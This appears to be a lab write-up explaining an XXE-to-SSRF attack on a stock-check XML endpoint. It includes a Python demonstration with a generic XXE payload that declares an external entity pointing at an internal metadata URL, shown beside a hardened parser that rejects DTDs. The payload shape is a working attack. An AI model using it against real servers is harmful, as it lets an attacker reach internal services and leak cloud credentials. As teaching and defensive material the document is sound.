This lab focused on using XXE to perform an SSRF attack. The application had a 'Check stock' feature that accepted XML input and parsed it with external entity resolution enabled. By injecting a malicious DTD, I was able to declare an external entity whose SYSTEM identifier pointed at an internal endpoint.
Because the entity is expanded on the server, exploiting this XXE vulnerability let me make the application server issue requests to internal addresses on my behalf: the request originates from the server's network position, not from my browser. Through that SSRF, sensitive metadata from the internal endpoint could be accessed.
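To make the mechanism concrete, here is an added example (my own illustration, not the lab's code) of a stock-check handler whose XML parser dereferences SYSTEM identifiers, beside the hardened configuration that rejects a DOCTYPE outright. It uses Python's stdlib expat binding; the hostname `internal.example` and the `FAKE_INTERNAL_NETWORK` lookup table are constructed stand-ins so it runs offline, and the payload shape (DTD declaring `xxe`, reference inside `productId`) is the generic XXE-to-SSRF pattern rather than the lab's exact request.

```python
"""Added example (not the lab's own code): an XML stock-check handler whose
parser dereferences SYSTEM identifiers, turning a user-supplied DTD into an
SSRF primitive, beside a hardened version that rejects DTDs outright."""
import xml.parsers.expat

# Constructed stand-in for the internal network so the example runs offline.
# The hostname is hypothetical; in a real deployment this would be an address
# reachable from the application server but not from the attacker.
FAKE_INTERNAL_NETWORK = {
    "http://internal.example/latest/meta-data/": "ami-id\ninstance-id\n",
}

# Generic payload shape: a DTD declaring an external entity that points at the
# internal URL, referenced where the application echoes the value back.
XXE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://internal.example/latest/meta-data/">
]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"""

BENIGN_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>"""


def check_stock(xml_text, hardened=False):
    """Parse a stockCheck document; return (productId, urls_fetched, error).

    hardened=False models the vulnerable deployment: the parser resolves any
    SYSTEM identifier named in the DTD and splices the response into the
    document, so the server makes the request on the attacker's behalf.
    hardened=True refuses the DOCTYPE before any entity can be declared.
    """
    parser = xml.parsers.expat.ParserCreate()
    product, fetched = [], []
    state = {"in_product": False}

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if hardened:
            # Rejecting the DTD entirely is the usual fix: no DTD means no
            # entity declarations and nothing external to resolve.
            raise ValueError("DOCTYPE not permitted")

    def external_ref(context, base, system_id, public_id):
        if hardened:
            return 0  # defence in depth: expat reports this as an ExpatError
        # Vulnerable path: "fetch" the URL (dict lookup here) and parse the
        # body as document content, exactly as a resolving parser would.
        fetched.append(system_id)
        body = FAKE_INTERNAL_NETWORK.get(system_id, "")
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)  # the child parser shares the parent's handlers
        return 1

    def start(name, attrs):
        if name == "productId":
            state["in_product"] = True

    def end(name):
        if name == "productId":
            state["in_product"] = False

    def chars(data):
        if state["in_product"]:
            product.append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    try:
        parser.Parse(xml_text, True)
    except (ValueError, xml.parsers.expat.ExpatError) as exc:
        return None, fetched, str(exc)
    return "".join(product), fetched, None


if __name__ == "__main__":
    for label, payload, hardened in [
        ("vulnerable parser, XXE payload", XXE_PAYLOAD, False),
        ("hardened parser, XXE payload", XXE_PAYLOAD, True),
        ("hardened parser, benign request", BENIGN_REQUEST, True),
    ]:
        print(label, "->", check_stock(payload, hardened))
```

The vulnerable run returns the internal endpoint's body as the "product ID" and records one outbound request to the internal URL; the hardened run fails at the DOCTYPE, makes no request, and still accepts an ordinary stock-check document. The same split applies to real parsers: disable DOCTYPE or external entity resolution in the parser's configuration rather than trying to filter the XML text.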